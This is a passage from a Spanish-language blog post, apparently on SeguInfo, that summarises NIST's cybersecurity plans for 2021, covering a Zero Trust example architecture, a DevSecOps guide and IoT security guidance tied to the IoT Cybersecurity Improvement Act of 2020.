proyecto Zero Trust se busca construir una arquitectura de ejemplo que
demuestre una implementación práctica de conceptos y principios de
"confianza cero" utilizando productos disponibles comercialmente.
</li>
<li>
El esfuerzo DevSecOps recibió apoyo de las partes interesadas y ahora se
busca integrar la seguridad en la planificación y los procesos de DevOps y a
crear una guía práctica.
</li>
<li>
Los dispositivos de IoT son cada vez más integrales de los sistemas de
información. Existen
<a href="https://www.nist.gov/blogs/cybersecurity-insights/rounding-your-iot-security-requirements-draft-nist-guidance-federal" rel="nofollow" target="_blank">cuatro documentos</a>
publicados en diciembre, con el objetivo de garantizar que los dispositivos
de IoT estén integrados en los controles de seguridad y privacidad de los
sistemas de información. Los documentos ayudan a abordar los mandatos de la
<a href="https://www.congress.gov/bill/116th-congress/house-bill/1668" rel="nofollow" target="_blank">Ley de mejora de la ciberseguridad de IoT de 2020</a>
promulgada recientemente en EE.UU. y ayudará a garantizar que el gobierno y
los fabricantes de dispositivos de IoT estén en la misma página.
</li>
</ul>
<p>
Fuente:
<a href="https://www.nist.gov/blogs/cybersecurity-insights/2021-whats-ahead-nist-cybersecurity-and-privacy" rel="nofollow" target="_blank">NIST</a>
</p>
SeguInfohttp://www.blogger.com/profile/11759277836606336524noreply@blogger.com0